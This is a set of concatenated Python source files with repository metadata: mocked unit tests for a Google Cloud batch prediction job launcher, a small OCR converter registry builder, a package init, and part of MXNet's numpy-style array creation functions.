  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  def test_batch_prediction_job_remote_runner_on_region_is_set_correctly_in_client_options(
      self, mock_job_service_client):
    """The API endpoint must be derived from the requested location."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client

    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name

    get_batch_prediction_job_response = mock.Mock()
    job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
    get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED

    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)
    mock_job_service_client.assert_called_once_with(
        client_options={
            'api_endpoint': 'test_region-aiplatform.googleapis.com'
        },
        client_info=mock.ANY)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  def test_batch_prediction_job_remote_runner_on_payload_deserializes_correctly(
      self, mock_path_exists, mock_job_service_client):
    """The JSON payload must be parsed and passed through unchanged."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client

    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name

    get_batch_prediction_job_response = mock.Mock()
    job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
    get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED

    # Pretend no prior gcp_resources file exists so the runner starts fresh.
    mock_path_exists.return_value = False
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)

    expected_parent = f'projects/{self._project}/locations/{self._location}'
    expected_job_spec = json.loads(self._payload, strict=False)
    job_client.create_batch_prediction_job.assert_called_once_with(
        parent=expected_parent, batch_prediction_job=expected_job_spec)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  def test_batch_prediction_job_remote_runner_raises_exception_on_error(
      self, mock_path_exists, mock_job_service_client):
    """A job that ends in JOB_STATE_FAILED must surface as RuntimeError."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client

    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name

    get_batch_prediction_job_response = mock.Mock()
    job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
    get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_FAILED

    mock_path_exists.return_value = False
    with self.assertRaises(RuntimeError):
      batch_prediction_job_remote_runner.create_batch_prediction_job(
          self._job_type, self._project, self._location, self._payload,
          self._gcp_resources)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  @mock.patch.object(time, 'sleep', autospec=True)
  def test_batch_prediction_job_remote_runner_retries_to_get_status_on_non_completed_job(
      self, mock_time_sleep, mock_path_exists, mock_job_service_client):
    """A RUNNING job must be polled again after the polling interval."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client

    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name

    # First poll reports RUNNING, second reports SUCCEEDED.
    get_batch_prediction_job_response_success = mock.Mock()
    get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
    get_batch_prediction_job_response_running = mock.Mock()
    get_batch_prediction_job_response_running.state = gca_job_state.JobState.JOB_STATE_RUNNING
    job_client.get_batch_prediction_job.side_effect = [
        get_batch_prediction_job_response_running,
        get_batch_prediction_job_response_success
    ]

    mock_path_exists.return_value = False
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)
    mock_time_sleep.assert_called_once_with(
        job_remote_runner._POLLING_INTERVAL_IN_SECONDS)
    self.assertEqual(job_client.get_batch_prediction_job.call_count, 2)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  def test_batch_prediction_job_remote_runner_returns_gcp_resources(
      self, mock_path_exists, mock_job_service_client):
    """The runner must write a gcp_resources file naming the created job."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client

    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name

    get_batch_prediction_job_response_success = mock.Mock()
    get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
    job_client.get_batch_prediction_job.side_effect = [
        get_batch_prediction_job_response_success
    ]

    mock_path_exists.return_value = False
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)

    with open(self._gcp_resources) as f:
      serialized_gcp_resources = f.read()

      # Parse the serialized output back into a GcpResources proto.
      batch_prediction_job_resources = json_format.Parse(
          serialized_gcp_resources, GcpResources())
      self.assertEqual(len(batch_prediction_job_resources.resources), 1)

      # The resource URI is the API prefix followed by the job name.
      batch_prediction_job_name = batch_prediction_job_resources.resources[
          0].resource_uri[len(self._batch_prediction_job_uri_prefix):]
      self.assertEqual(batch_prediction_job_name,
                       self._batch_prediction_job_name)
| 45.152284 | 115 | 0.793479 |
import json
from logging import raiseExceptions
import os
import time
import unittest
from unittest import mock
from google.cloud import aiplatform
from google.cloud.aiplatform.compat.types import job_state as gca_job_state
from google.protobuf import json_format
from google_cloud_pipeline_components.proto.gcp_resources_pb2 import GcpResources
from google_cloud_pipeline_components.container.experimental.gcp_launcher import batch_prediction_job_remote_runner
from google_cloud_pipeline_components.container.experimental.gcp_launcher import job_remote_runner
class BatchPredictionJobRemoteRunnerUtilsTests(unittest.TestCase):
  """Unit tests for the batch prediction job remote runner launcher.

  Each test stubs out ``aiplatform.gapic.JobServiceClient`` and checks one
  aspect of ``create_batch_prediction_job``.
  """

  def setUp(self):
    super(BatchPredictionJobRemoteRunnerUtilsTests, self).setUp()
    # Serialized BatchPredictionJob spec the launcher deserializes and
    # forwards to the JobService API.
    self._payload = (
        '{"batchPredictionJob": {"displayName": '
        '"BatchPredictionComponentName", "model": '
        '"projects/test/locations/test/models/test-model","inputConfig":'
        ' {"instancesFormat": "CSV","gcsSource": {"uris": '
        '["test_gcs_source"]}}, "outputConfig": {"predictionsFormat": '
        '"CSV", "gcsDestination": {"outputUriPrefix": '
        '"test_gcs_destination"}}}}')
    self._job_type = 'BatchPredictionJob'
    self._project = 'test_project'
    self._location = 'test_region'
    # NOTE(review): this literal looks like it was meant to be an f-string;
    # without the f-prefix the {self._project}/{self._location} placeholders
    # stay verbatim. The mocks below echo the value, so tests still pass.
    self._batch_prediction_job_name = '/projects/{self._project}/locations/{self._location}/jobs/test_job_id'
    self._gcp_resources = 'gcp_resources'
    self._batch_prediction_job_uri_prefix = f'https://{self._location}-aiplatform.googleapis.com/v1/'

  def tearDown(self):
    # Remove the gcp_resources file a test run may have written.
    if os.path.exists(self._gcp_resources):
      os.remove(self._gcp_resources)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  def test_batch_prediction_job_remote_runner_on_region_is_set_correctly_in_client_options(
      self, mock_job_service_client):
    """The API endpoint must be derived from the requested location."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client
    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name
    get_batch_prediction_job_response = mock.Mock()
    job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
    get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)
    mock_job_service_client.assert_called_once_with(
        client_options={
            'api_endpoint': 'test_region-aiplatform.googleapis.com'
        },
        client_info=mock.ANY)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  def test_batch_prediction_job_remote_runner_on_payload_deserializes_correctly(
      self, mock_path_exists, mock_job_service_client):
    """The JSON payload must be parsed and passed through unchanged."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client
    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name
    get_batch_prediction_job_response = mock.Mock()
    job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
    get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
    # Pretend no prior gcp_resources file exists so the runner starts fresh.
    mock_path_exists.return_value = False
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)
    expected_parent = f'projects/{self._project}/locations/{self._location}'
    expected_job_spec = json.loads(self._payload, strict=False)
    job_client.create_batch_prediction_job.assert_called_once_with(
        parent=expected_parent, batch_prediction_job=expected_job_spec)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  def test_batch_prediction_job_remote_runner_raises_exception_on_error(
      self, mock_path_exists, mock_job_service_client):
    """A job that ends in JOB_STATE_FAILED must surface as RuntimeError."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client
    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name
    get_batch_prediction_job_response = mock.Mock()
    job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
    get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_FAILED
    mock_path_exists.return_value = False
    with self.assertRaises(RuntimeError):
      batch_prediction_job_remote_runner.create_batch_prediction_job(
          self._job_type, self._project, self._location, self._payload,
          self._gcp_resources)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  @mock.patch.object(time, 'sleep', autospec=True)
  def test_batch_prediction_job_remote_runner_retries_to_get_status_on_non_completed_job(
      self, mock_time_sleep, mock_path_exists, mock_job_service_client):
    """A RUNNING job must be polled again after the polling interval."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client
    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name
    # First poll reports RUNNING, second reports SUCCEEDED.
    get_batch_prediction_job_response_success = mock.Mock()
    get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
    get_batch_prediction_job_response_running = mock.Mock()
    get_batch_prediction_job_response_running.state = gca_job_state.JobState.JOB_STATE_RUNNING
    job_client.get_batch_prediction_job.side_effect = [
        get_batch_prediction_job_response_running,
        get_batch_prediction_job_response_success
    ]
    mock_path_exists.return_value = False
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)
    mock_time_sleep.assert_called_once_with(
        job_remote_runner._POLLING_INTERVAL_IN_SECONDS)
    self.assertEqual(job_client.get_batch_prediction_job.call_count, 2)

  @mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
  @mock.patch.object(os.path, 'exists', autospec=True)
  def test_batch_prediction_job_remote_runner_returns_gcp_resources(
      self, mock_path_exists, mock_job_service_client):
    """The runner must write a gcp_resources file naming the created job."""
    job_client = mock.Mock()
    mock_job_service_client.return_value = job_client
    create_batch_prediction_job_response = mock.Mock()
    job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
    create_batch_prediction_job_response.name = self._batch_prediction_job_name
    get_batch_prediction_job_response_success = mock.Mock()
    get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
    job_client.get_batch_prediction_job.side_effect = [
        get_batch_prediction_job_response_success
    ]
    mock_path_exists.return_value = False
    batch_prediction_job_remote_runner.create_batch_prediction_job(
        self._job_type, self._project, self._location, self._payload,
        self._gcp_resources)
    with open(self._gcp_resources) as f:
      serialized_gcp_resources = f.read()
      # Parse the serialized output back into a GcpResources proto.
      batch_prediction_job_resources = json_format.Parse(
          serialized_gcp_resources, GcpResources())
      self.assertEqual(len(batch_prediction_job_resources.resources), 1)
      # The resource URI is the API prefix followed by the job name.
      batch_prediction_job_name = batch_prediction_job_resources.resources[
          0].resource_uri[len(self._batch_prediction_job_uri_prefix):]
      self.assertEqual(batch_prediction_job_name,
                       self._batch_prediction_job_name)
f723644d5ba0725447dbdcb5d493e4a75f71dbeb | 763 | py | Python | davarocr/davarocr/davar_rcg/core/converter/builder.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | 387 | 2021-01-02T07:50:15.000Z | 2022-03-31T04:30:03.000Z | davarocr/davarocr/davar_rcg/core/converter/builder.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | 70 | 2021-05-04T18:28:18.000Z | 2022-03-31T14:14:52.000Z | davarocr/davarocr/davar_rcg/core/converter/builder.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | 83 | 2021-01-05T08:28:26.000Z | 2022-03-31T07:14:03.000Z | """
##################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : builder.py
# Abstract :
# Current Version: 1.0.0
# Date : 2020-05-31
##################################################################################################
"""
from mmcv.utils import Registry, build_from_cfg
CONVERTER = Registry('converter')
def build_converter(cfg):
    """Build a converter instance from its registry configuration.

    Args:
        cfg (dict): converter config; must contain a string ``'type'`` key
            naming a class registered in the ``CONVERTER`` registry, plus
            any keyword arguments for that class's constructor.

    Returns:
        object: the instantiated converter.
    """
    assert 'type' in cfg and isinstance(cfg['type'], str)
    converter = build_from_cfg(cfg, CONVERTER)
    return converter
| 26.310345 | 98 | 0.461337 | from mmcv.utils import Registry, build_from_cfg
CONVERTER = Registry('converter')
def build_converter(cfg):
    """Instantiate the converter described by ``cfg`` from the CONVERTER registry."""
    assert 'type' in cfg and isinstance(cfg['type'], str)
    return build_from_cfg(cfg, CONVERTER)
| true | true |
f72364784036bde554a49495f1294fef3facd59c | 91 | py | Python | gan2shape/__init__.py | PeterouZh/GAN2Shape | ea077e543a3fb824ce06385e8a837dcbae8e9aaa | [
"MIT"
] | 421 | 2020-11-03T01:58:39.000Z | 2022-03-26T15:09:21.000Z | gan2shape/__init__.py | karandeepdps/GAN2Shape | 09882aed3526c8cee42c30beb5a67977e311bb08 | [
"MIT"
] | 41 | 2020-11-09T09:20:24.000Z | 2022-03-27T10:15:38.000Z | gan2shape/__init__.py | karandeepdps/GAN2Shape | 09882aed3526c8cee42c30beb5a67977e311bb08 | [
"MIT"
] | 73 | 2020-11-03T04:04:55.000Z | 2022-03-24T03:41:38.000Z | from .utils import setup_runtime
from .trainer import Trainer
from .model import GAN2Shape
| 22.75 | 32 | 0.835165 | from .utils import setup_runtime
from .trainer import Trainer
from .model import GAN2Shape
| true | true |
f723653996386d4bb9b6bb522231bb66a1d58853 | 246,891 | py | Python | python/mxnet/ndarray/numpy/_op.py | ThomasGmeinder/incubator-mxnet | 49292cef7c85dbe00abc3a6e79cb70644f753d6f | [
"Apache-2.0"
] | null | null | null | python/mxnet/ndarray/numpy/_op.py | ThomasGmeinder/incubator-mxnet | 49292cef7c85dbe00abc3a6e79cb70644f753d6f | [
"Apache-2.0"
] | 2 | 2021-12-10T01:52:29.000Z | 2021-12-14T22:00:17.000Z | python/mxnet/ndarray/numpy/_op.py | Samuel-wei/incubator-mxnet | 0f3c5da37bf1647e18fce26beb9f06f5d6183846 | [
"BSL-1.0",
"Apache-2.0"
] | null | null | null | # pylint: disable=C0302
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-argument
"""Namespace for numpy operators used in Gluon dispatched by F=ndarray."""
import numpy as _np
from ...base import numeric_types, integer_types
from ...util import _sanity_check_params, set_module
from ...util import wrap_np_unary_func, wrap_np_binary_func
from ...context import current_context
from . import _internal as _npi
from ..ndarray import NDArray
# Public API of this module: every operator name exported to the
# `mxnet.ndarray.numpy` namespace.
__all__ = ['shape', 'zeros', 'zeros_like', 'ones', 'ones_like', 'full', 'full_like', 'empty_like', 'invert', 'delete',
           'add', 'broadcast_to', 'subtract', 'multiply', 'divide', 'mod', 'remainder', 'power', 'bitwise_not',
           'arctan2', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt', 'abs', 'insert',
           'absolute', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log', 'degrees', 'log2', 'matmul',
           'log1p', 'rint', 'radians', 'reciprocal', 'square', 'negative', 'fix', 'ceil', 'floor', 'histogram',
           'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh', 'argsort', 'sort',
           'tensordot', 'eye', 'linspace',
           'logspace', 'expand_dims', 'tile', 'arange', 'array_split', 'split', 'hsplit', 'vsplit', 'dsplit',
           'concatenate', 'append', 'stack', 'vstack', 'row_stack', 'column_stack', 'hstack', 'dstack',
           'average', 'mean', 'maximum', 'minimum',
           'swapaxes', 'clip', 'argmax', 'argmin', 'std', 'var', 'indices', 'copysign', 'ravel', 'unravel_index',
           'diag_indices_from', 'hanning', 'hamming', 'blackman', 'flip', 'flipud', 'fliplr', 'around', 'round',
           'hypot', 'bitwise_and', 'bitwise_xor', 'bitwise_or', 'rad2deg', 'deg2rad', 'unique', 'lcm',
           'tril', 'identity', 'take', 'ldexp', 'vdot', 'inner', 'outer',
           'equal', 'not_equal', 'greater', 'less', 'greater_equal', 'less_equal', 'rot90', 'einsum',
           'true_divide', 'nonzero', 'quantile', 'percentile', 'shares_memory', 'may_share_memory',
           'diff', 'resize', 'polyval', 'nan_to_num', 'isnan', 'isinf', 'isposinf', 'isneginf', 'isfinite',
           'where', 'bincount']
@set_module('mxnet.ndarray.numpy')
def shape(a):
    """Return the shape of an array.

    Parameters
    ----------
    a : array_like
        Input array.

    Returns
    -------
    shape : tuple of ints
        Length of each dimension of `a`.

    See Also
    --------
    ndarray.shape : Equivalent array attribute.

    Examples
    --------
    >>> np.shape(np.eye(3))
    (3, 3)
    >>> np.shape([[1, 2]])
    (1, 2)
    >>> np.shape([0])
    (1,)
    >>> np.shape(0)
    ()
    """
    # Delegate straight to the array's own shape attribute.
    return a.shape
@set_module('mxnet.ndarray.numpy')
def zeros(shape, dtype=_np.float32, order='C', ctx=None):  # pylint: disable=redefined-outer-name
    """Return a new array of the given shape and type, filled with zeros.

    Only row-major (C-style) storage is currently supported.

    Parameters
    ----------
    shape : int or tuple of int
        Shape of the new array.
    dtype : str or numpy.dtype, optional
        Value type of the result. Defaults to `numpy.float32` — unlike
        official NumPy's `float64` default — because `float32` is the
        conventional default dtype in deep learning.
    order : {'C'}, optional, default: 'C'
        Memory layout; only row-major (C-style) is accepted.
    ctx : Context, optional
        Device context (defaults to the current default context).

    Returns
    -------
    out : ndarray
        Array of zeros with the given shape, dtype, and ctx.
    """
    if order != 'C':
        raise NotImplementedError
    return _npi.zeros(shape=shape,
                      ctx=current_context() if ctx is None else ctx,
                      dtype=_np.float32 if dtype is None else dtype)
@set_module('mxnet.ndarray.numpy')
def ones(shape, dtype=_np.float32, order='C', ctx=None):  # pylint: disable=redefined-outer-name
    """Return a new array of the given shape and type, filled with ones.

    Only row-major (C-style) storage is currently supported.

    Parameters
    ----------
    shape : int or tuple of int
        Shape of the new array.
    dtype : str or numpy.dtype, optional
        Value type of the result. Defaults to `numpy.float32` — unlike
        official NumPy's `float64` default — because `float32` is the
        conventional default dtype in deep learning.
    order : {'C'}, optional, default: 'C'
        Memory layout; only row-major (C-style) is accepted.
    ctx : Context, optional
        Device context (defaults to the current default context).

    Returns
    -------
    out : ndarray
        Array of ones with the given shape, dtype, and ctx.
    """
    if order != 'C':
        raise NotImplementedError
    return _npi.ones(shape=shape,
                     ctx=current_context() if ctx is None else ctx,
                     dtype=_np.float32 if dtype is None else dtype)
# pylint: disable=too-many-arguments, redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def zeros_like(a, dtype=None, order='C', ctx=None, out=None):
    """Return an array of zeros with the same shape and type as a given array.

    Parameters
    ----------
    a : ndarray
        Array whose shape and data-type define those of the result.
    dtype : data-type, optional
        Overrides the data type of the result. Boolean type is temporarily
        not supported.
    order : {'C'}, optional
        Memory layout; only row-major (C-style) is accepted.
    ctx : Context, optional
        Device on which to create the result, e.g. the i-th GPU.
    out : ndarray or None, optional
        Location into which the result is stored. If provided, it must have
        the same shape and dtype as the input ndarray. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Array of zeros with the same shape and type as `a`.

    See Also
    --------
    empty_like : Return an empty array with shape and type of input.
    ones_like : Return an array of ones with shape and type of input.
    full : Return a new array of given shape filled with value.

    Examples
    --------
    >>> x = np.arange(6).reshape((2, 3))
    >>> np.zeros_like(x)
    array([[0., 0., 0.],
           [0., 0., 0.]])
    >>> np.zeros_like(x, int)
    array([[0, 0, 0],
           [0, 0, 0]], dtype=int64)
    >>> y = np.arange(3, dtype=float)
    >>> np.zeros_like(y)
    array([0., 0., 0.], dtype=float64)
    """
    if order != 'C':
        raise NotImplementedError
    # Implemented as a zero-valued full_like on the backend.
    return _npi.full_like(a, fill_value=0, dtype=dtype,
                          ctx=current_context() if ctx is None else ctx,
                          out=out)
@set_module('mxnet.ndarray.numpy')
def ones_like(a, dtype=None, order='C', ctx=None, out=None):
    """Return an array of ones with the same shape and type as a given array.

    Parameters
    ----------
    a : ndarray
        Array whose shape and data-type define those of the result.
    dtype : data-type, optional
        Overrides the data type of the result. Boolean type is temporarily
        not supported.
    order : {'C'}, optional
        Memory layout; only row-major (C-style) is accepted.
    ctx : Context, optional
        Device on which to create the result, e.g. the i-th GPU.
    out : ndarray or None, optional
        Location into which the result is stored. If provided, it must have
        the same shape and dtype as the input ndarray. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Array of ones with the same shape and type as `a`.

    See Also
    --------
    empty_like : Return an empty array with shape and type of input.
    zeros_like : Return an array of zeros with shape and type of input.
    full_like : Return a new array with shape of input filled with value.
    ones : Return a new array setting values to one.

    Examples
    --------
    >>> x = np.arange(6).reshape((2, 3))
    >>> np.ones_like(x)
    array([[1., 1., 1.],
           [1., 1., 1.]])
    >>> np.ones_like(x, int)
    array([[1, 1, 1],
           [1, 1, 1]], dtype=int64)
    >>> y = np.arange(3, dtype=float)
    >>> np.ones_like(y)
    array([1., 1., 1.], dtype=float64)
    """
    if order != 'C':
        raise NotImplementedError
    # Implemented as a one-valued full_like on the backend.
    return _npi.full_like(a, fill_value=1, dtype=dtype,
                          ctx=current_context() if ctx is None else ctx,
                          out=out)
@set_module('mxnet.ndarray.numpy')
def broadcast_to(array, shape):
    """Broadcast an array to a new shape.

    Parameters
    ----------
    array : ndarray or scalar
        The array to broadcast.
    shape : tuple
        The shape of the desired array.

    Returns
    -------
    broadcast : array
        A readonly view on the original array with the given shape. It is
        typically not contiguous, and more than one element of the result
        may refer to a single memory location.

    Raises
    ------
    MXNetError
        If the array is not compatible with the new shape according to
        NumPy's broadcasting rules.
    """
    if not _np.isscalar(array):
        return _npi.broadcast_to(array, shape)
    # A scalar has no array to view; materialize a filled array of the
    # requested shape instead.
    return full(shape, array)
@set_module('mxnet.ndarray.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None):  # pylint: disable=too-many-arguments
    """Return a new array of given shape and type, filled with `fill_value`.

    Parameters
    ----------
    shape : int or sequence of ints
        Shape of the new array, e.g., ``(2, 3)`` or ``2``.
    fill_value : scalar or ndarray
        Fill value.
    dtype : data-type, optional
        The desired data-type for the array. The default, `None`, means
        `np.array(fill_value).dtype`.
    order : {'C'}, optional
        Memory layout; only row-major (C-style) is accepted.
    ctx : Context, optional
        Device on which to create the result, e.g. the i-th GPU.
    out : ndarray or None, optional
        Location into which the result is stored. If provided, it must have
        the same shape and dtype as the input ndarray. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Array of `fill_value` with the given shape, dtype, and order.
        If `fill_value` is an ndarray, out will have the same context as
        `fill_value` regardless of the provided `ctx`.

    Notes
    -----
    This function differs from the original `numpy.full
    https://docs.scipy.org/doc/numpy/reference/generated/numpy.full.html`_ in
    the following way(s):

    - Has an additional `ctx` argument to specify the device
    - Has an additional `out` argument
    - Currently does not support `order` selection

    See Also
    --------
    empty : Return a new uninitialized array.
    ones : Return a new array setting values to one.
    zeros : Return a new array setting values to zero.

    Examples
    --------
    >>> np.full((2, 2), 10)
    array([[10., 10.],
           [10., 10.]])
    >>> np.full((2, 2), 2, dtype=np.int32, ctx=mx.cpu(0))
    array([[2, 2],
           [2, 2]], dtype=int32)
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    if isinstance(fill_value, NDArray):
        # An ndarray fill value is broadcast to `shape` (and optionally
        # cast); note that `out` and `ctx` are not applied on this path.
        ret = broadcast_to(fill_value, shape)
        return ret if dtype is None else ret.astype(dtype)
    if dtype is None:
        dtype = _np.float32
    return _npi.full(shape=shape, value=fill_value, ctx=ctx, dtype=dtype, out=out)
# pylint: enable=too-many-arguments, redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def full_like(a, fill_value, dtype=None, order='C', ctx=None, out=None):  # pylint: disable=too-many-arguments
    """Return a full array with the same shape and type as a given array.

    Parameters
    ----------
    a : ndarray
        Array whose shape and data-type define those of the result.
    fill_value : scalar
        Fill value.
    dtype : data-type, optional
        Overrides the data type of the result. Boolean type is temporarily
        not supported.
    order : {'C'}, optional
        Memory layout; only row-major (C-style) is accepted.
    ctx : Context, optional
        Device on which to create the result, e.g. the i-th GPU.
    out : ndarray or None, optional
        Location into which the result is stored. If provided, it must have
        the same shape and dtype as the input ndarray. If not provided or
        `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Array of `fill_value` with the same shape and type as `a`.

    See Also
    --------
    empty_like : Return an empty array with shape and type of input.
    ones_like : Return an array of ones with shape and type of input.
    zeros_like : Return an array of zeros with shape and type of input.
    full : Return a new array of given shape filled with value.

    Examples
    --------
    >>> x = np.arange(6, dtype=int)
    >>> np.full_like(x, 1)
    array([1, 1, 1, 1, 1, 1], dtype=int64)
    >>> np.full_like(x, 0.1)
    array([0, 0, 0, 0, 0, 0], dtype=int64)
    >>> np.full_like(x, 0.1, dtype=np.float64)
    array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1], dtype=float64)
    >>> np.full_like(x, np.nan, dtype=np.double)
    array([nan, nan, nan, nan, nan, nan], dtype=float64)
    """
    if order != 'C':
        raise NotImplementedError
    return _npi.full_like(a, fill_value=fill_value, dtype=dtype,
                          ctx=current_context() if ctx is None else ctx,
                          out=out)
@set_module('mxnet.ndarray.numpy')
def empty_like(prototype, dtype=None, order='C', subok=False, shape=None): # pylint: disable=W0621
    """
    Return a new array with the same shape and type as a given array.

    Parameters
    ----------
    prototype : ndarray
        The shape and data-type of `prototype` define these same attributes
        of the returned array.
    dtype : data-type, optional
        Overrides the data type of the result.
    order : {'C'}, optional
        Whether to store multidimensional data in C- or Fortran-contiguous
        (row- or column-wise) order in memory. Currently only supports C order.
    subok : {False}, optional
        If True, then the newly created array will use the sub-class
        type of 'a', otherwise it will be a base-class array. Defaults
        to False.
        (Only support False at this moment)
    shape : int or sequence of ints, optional.
        Overrides the shape of the result.
        (Not supported at this moment)

    Returns
    -------
    out : ndarray
        Array of uninitialized (arbitrary) data with the same
        shape and type as `prototype`.

    See Also
    --------
    ones_like : Return an array of ones with shape and type of input.
    zeros_like : Return an array of zeros with shape and type of input.
    full_like : Return a new array with shape of input filled with value.
    empty : Return a new uninitialized array.

    Notes
    -----
    This function does *not* initialize the returned array; to do that use
    `zeros_like` or `ones_like` instead. It may be marginally faster than
    the functions that do set the array values.

    Examples
    --------
    >>> a = np.array([[1,2,3], [4,5,6]])
    >>> np.empty_like(a)
    array([[-5764607523034234880, -2305834244544065442,      4563075075], # uninitialized
           [          4567052944, -5764607523034234880,  844424930131968]])
    >>> a = np.array([[1., 2., 3.],[4.,5.,6.]])
    >>> np.empty_like(a)
    array([[4.9e-324, 9.9e-324, 1.5e-323], # uninitialized
           [2.0e-323, 2.5e-323, 3.0e-323]])
    """
    # Canonical string names for the dtype objects accepted by the fallback op.
    dtype_list = {None:'None', _np.int8:'int8', _np.uint8:'uint8', _np.int32:'int32',
                  _np.int64:'int64', _np.float16:'float16', _np.float32:'float32',
